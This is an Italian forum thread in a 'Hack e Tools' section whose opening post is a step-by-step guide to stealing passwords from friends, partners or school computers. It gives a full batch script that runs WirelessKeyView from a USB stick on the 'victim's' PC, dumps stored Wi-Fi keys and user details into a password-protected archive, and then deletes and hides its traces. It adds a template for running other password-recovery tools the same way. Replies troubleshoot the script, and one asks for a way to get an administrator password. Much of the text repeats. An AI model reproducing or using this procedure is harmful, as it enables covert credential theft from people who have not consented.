Rubare Password da amici o vicini
4 partecipanti
Zermo2012 :: Informatica :: Hack e Tools
Pagina 1 di 1
Rubare Password da amici o vicini
Innanzitutto non è una cosa legale quindi questa semplice guida è a puro scopo informativo.
Quante volte avendo accesso ad un pc di un amico , o della fidnzata oppure perchè nò anche della scuola vi è balenata in mente l'idea.....
azzzzz se solo avessi piu tempo magari potrei scoprire le sue password etc. etc.
Quindi a questa fatidica domanda vi viene in aiuto il Vs. Caos
come procedere e di cosa abbiamo bisogno.
1 una chiavetta usb
2 accesso diretto al pc della vittima
3 winrar.exe che troverete nella cartella del vostro pc oppure scaricatelo da internet
4 tanta fantasia.
Per tanta fantasia intendo il fatto che solo voi potete decidere cosa rubacchiare.
ora sapete cosa volete rubacchiare?????
non importa io vi faccio un piccolo esempio per grabbargli la password di rete, comunque ripeto potete prendere la qualsiasi cosa vi venga in mente.
Procedimento furto rapido chiave di rete wifii
Creare una cartella sul desktop e chiamatela chiavetta.
scaricate questo programma Download WirelessKeyView (tranquilli è esente da virus perchè non lo è e quindi anche gli antivirus non lo rilevano come minaccia )
estraetelo nella cartella chiavetta.mi raccomando solo il file.exe cioè questo
WirelessKeyView.exe gli altri 2 file cioè il readme e il file info eliminateli che non vi servono.
copiate nella cartella anche winrar.exe e rinominatelo come Rar
ora aprite il notepad e create un documento con questi dati al suo interno. Ve li scrivo in verde perchè dovrete selezionarli dall'inizio alla fine.
@WirelessKeyView.exe /sverhtml WirelessKeyView.html
REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e’ %DATE% e sono le %TIME% >> log.txt
REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul
REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf
ora dove cè scritto pPASSWORD scriveteci una vostra password a piacere. vi faccio un esempio
pProvola oppure pFRASTUONO unica cosa dovrete ricordarvela in quanto il file salvato con i dati rubati andrà in un file protetto da quella password e valgono anche maiuscole e minuscole.
fatto questo passaggio salvatelo nella cartella chiavetta che avete creato sul vostro desktop come tutti i file e nominatelo avvio.bat
ok ora abbiamo finito.
inserite nella penna usb i file....
Avvio.bat
winrar rinominato in Rar.exe
WirelessKeyView.exe
ok la chiavetta è pronta ora non dovrete far altro che infilarla nel pc della vittima e clikkare sull'icona avvio e lui in automatico vi genererà una cartella compressa protetta dalla password che avete scritto nel file avvio.bat con dentro un documento con tutti i dati della sua rete wifii .
ok fin qui nel mio esempio credo di essere stato abbastanza chiaro. veniamo al discorso tanta fantasia.
su internet esistono una marea di programmini free per il recupero di qualsiasi cosa,
qui ne troverete un bel campionario [Devi essere iscritto e connesso per vedere questo link]
come procedere ora vi scrivo il file avvio.bat che potrete facilmente modificare per i vostri usi piu vari.
@nomedelprogramma.exe /sverhtml nomedelprogramma.html
@echo. >> log.txt
REM Compressione
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf
al posto di @nomedelprogramma.exe inserirete il nome del programmino da avviare idem al posto di nomedelprogramma.html
potete metterne anche piu di uno
Alla fine, salvate il file con il nome lancia.bat e vedrete che vi farà un report preciso di tutto quello che cercate.
sperando di esservi stato utile Il V.s. Caos ^^
P.s. vi conviene fare come ho fatto io prima testarlo su un vostro pc così vi renderete anche conto della rapidità della cosa
Quante volte avendo accesso ad un pc di un amico , o della fidnzata oppure perchè nò anche della scuola vi è balenata in mente l'idea.....
azzzzz se solo avessi piu tempo magari potrei scoprire le sue password etc. etc.
Quindi a questa fatidica domanda vi viene in aiuto il Vs. Caos
come procedere e di cosa abbiamo bisogno.
1 una chiavetta usb
2 accesso diretto al pc della vittima
3 winrar.exe che troverete nella cartella del vostro pc oppure scaricatelo da internet
4 tanta fantasia.
Per tanta fantasia intendo il fatto che solo voi potete decidere cosa rubacchiare.
ora sapete cosa volete rubacchiare?????
non importa io vi faccio un piccolo esempio per grabbargli la password di rete, comunque ripeto potete prendere la qualsiasi cosa vi venga in mente.
Procedimento furto rapido chiave di rete wifii
Creare una cartella sul desktop e chiamatela chiavetta.
scaricate questo programma Download WirelessKeyView (tranquilli è esente da virus perchè non lo è e quindi anche gli antivirus non lo rilevano come minaccia )
estraetelo nella cartella chiavetta.mi raccomando solo il file.exe cioè questo
WirelessKeyView.exe gli altri 2 file cioè il readme e il file info eliminateli che non vi servono.
copiate nella cartella anche winrar.exe e rinominatelo come Rar
ora aprite il notepad e create un documento con questi dati al suo interno. Ve li scrivo in verde perchè dovrete selezionarli dall'inizio alla fine.
@echo. >> log.txt
REM Compressione
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf
ora dove cè scritto pPASSWORD scriveteci una vostra password a piacere. vi faccio un esempio
pProvola oppure pFRASTUONO unica cosa dovrete ricordarvela in quanto il file salvato con i dati rubati andrà in un file protetto da quella password e valgono anche maiuscole e minuscole.
fatto questo passaggio salvatelo nella cartella chiavetta che avete creato sul vostro desktop come tutti i file e nominatelo avvio.bat
ok ora abbiamo finito.
inserite nella penna usb i file....
Avvio.bat
winrar rinominato in Rar.exe
WirelessKeyView.exe
ok la chiavetta è pronta ora non dovrete far altro che infilarla nel pc della vittima e clikkare sull'icona avvio e lui in automatico vi genererà una cartella compressa protetta dalla password che avete scritto nel file avvio.bat con dentro un documento con tutti i dati della sua rete wifii .
ok fin qui nel mio esempio credo di essere stato abbastanza chiaro. veniamo al discorso tanta fantasia.
su internet esistono una marea di programmini free per il recupero di qualsiasi cosa,
qui ne troverete un bel campionario [Devi essere iscritto e connesso per vedere questo link]
come procedere ora vi scrivo il file avvio.bat che potrete facilmente modificare per i vostri usi piu vari.
@nomedelprogramma.exe /sverhtml nomedelprogramma.html
@echo. >> log.txt
REM Compressione
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf
al posto di @nomedelprogramma.exe inserirete il nome del programmino da avviare idem al posto di nomedelprogramma.html
potete metterne anche piu di uno
Alla fine, salvate il file con il nome lancia.bat e vedrete che vi farà un report preciso di tutto quello che cercate.
sperando di esservi stato utile Il V.s. Caos ^^
P.s. vi conviene fare come ho fatto io prima testarlo su un vostro pc così vi renderete anche conto della rapidità della cosa
Re: Rubare Password da amici o vicini
Dove che apro il file avvio.bat appare un secondo il prompt dei comandi, poi sparisce dalla pennina il file WirellesKeyView.exe...non mi dovrebbe apparire un file .rar con dentro tutte le password?
ecco cosa ho messo nella pennina:
[Devi essere iscritto e connesso per vedere questa immagine]
ah siccome io devo cercare la password di amministratore mi puoi segnalare il programma giusto,grazie!
ah siccome io devo cercare la password di amministratore mi puoi segnalare il programma giusto,grazie!
wall- Responsabile
ma il in avvio.bat hai scritto in modo identico al mio? Per la tua domanda..... che sistema operativo è?
@echo. >> log.txt
REM Compressione
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf
@echo. >> log.txt
REM Compressione
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf
si ho fatto copia e incolla, perchè devo modificare i campi scritti in maiuscolo?
il sistema operativo è Windows 7 a 64bit
il sistema operativo è Windows 7 a 64bit
wall- Responsabile
guarda io l'ho testato personalmente prima di fare il topic sia su XP che su Vista purtroppo al momento non ho un pc sottomano con windows 7
ma ho trovato un programmino free per fare dei autolaunch per usb ora lo provo e poi ti saprò dire
ma ho trovato un programmino free per fare dei autolaunch per usb ora lo provo e poi ti saprò dire
Ottimo lavoro ! Adesso lo provo
Derp- Admin
@Caos hai novità?
wall- Responsabile
come ti ho detto ho trovato un programma per fare gli autolaunch da usb per Windows 7 ma ancora non riesco a farlo funzionare bene!
L'unic cosa strana e che a me funzioni sia su xp che su Vista e a te su windows 7 no. Spero che Derp mi dica se a lui funziona su 7 o se ha gli stessi problemi che hai tu!
L'unic cosa strana e che a me funzioni sia su xp che su Vista e a te su windows 7 no. Spero che Derp mi dica se a lui funziona su 7 o se ha gli stessi problemi che hai tu!
AndreucciS ha scritto:Dove che apro il file avvio.bat appare un secondo il prompt dei comandi, poi sparisce dalla pennina il file WirellesKeyView.exe...non mi dovrebbe apparire un file .rar con dentro tutte le password?
Non so se magari in tutto questo tempo hai già capito ma nel caso volevo farti notare che il motivo per cui non ti funziona è che rar.exe non deve essere un collegamento ma la copia del file winrar.exe
" longdesc="76" />
dave666- Recluta
Argomenti simili
» Troppo amici
» Vicini Del Terzo Tipo
» gioco carino :-) trova la password
» Come faccio a scoprire la password amministratore?
» Avviare Windows 8 senza digitare la password di accesso all’account
» Vicini Del Terzo Tipo
» gioco carino :-) trova la password
» Come faccio a scoprire la password amministratore?
» Avviare Windows 8 senza digitare la password di accesso all’account
Zermo2012 :: Informatica :: Hack e Tools
Pagina 1 di 1